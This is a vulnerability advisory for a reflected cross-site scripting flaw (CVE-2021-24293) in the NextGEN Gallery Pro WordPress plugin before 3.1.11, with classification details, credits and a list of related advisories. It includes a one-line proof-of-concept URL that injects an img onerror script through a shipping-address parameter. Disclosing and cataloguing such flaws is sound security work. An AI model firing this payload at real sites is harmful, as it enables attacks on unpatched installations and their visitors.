WordPress Plugin Vulnerabilities

NextGEN Gallery Pro < 3.1.11 - Reflected Cross-Site Scripting (XSS)

Description

In the eCommerce module of NextGEN Gallery Pro, there is an action to call get_cart_items via photocrati_ajax , after that the settings[shipping_address][name] is able to inject malicious javascript.

Proof of Concept

On a page where a NextGEN (Pro) gallery is embed: ?photocrati_ajax=1&action=get_cart_items&cart=&settings[shipping_address][name]=a%3Cimg%20src=x%20onerror=alert('XSS')%3E

Affects Plugins

Plugin icon
nextgen-gallery-pro
Fixed in 3.1.11

References

CVE
CVE-2021-24293
URL
https://www.imagely.com/wordpress-gallery-plugin/nextgen-pro/changelog/

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
6.1 (medium)

Miscellaneous

Original Researcher
mgthuramoemyint
Submitter
ThuraMoeMyint
Submitter twitter
mgthuramoemyint
Verified
Yes
WPVDB ID
5e1a4725-3d20-44b0-8a35-bbf4263957f7

Timeline

Publicly Published
2021-02-24 (about 2 years ago)
Added
2021-02-24 (about 2 years ago)
Last Updated
2021-04-29 (about 2 years ago)

Other

Published
Title
Published
2014-11-20
Title
WP Statistics <= 8.3 - Stored & Reflected Cross-Site Scripting (XSS)
Published
2022-12-14
Title
WP Table Reloaded <= 1.9.4 - Contributor+ Stored XSS
Published
2015-08-24
Title
Googmonify <= 0.5.1 - CSRF & XSS
Published
2023-04-19
Title
Ninja Tables < 4.3.5 - Admin+ Stored XSS
Published
2021-08-16
Title
Language Bar Flags <= 1.0.8 - CSRF to Stored XSS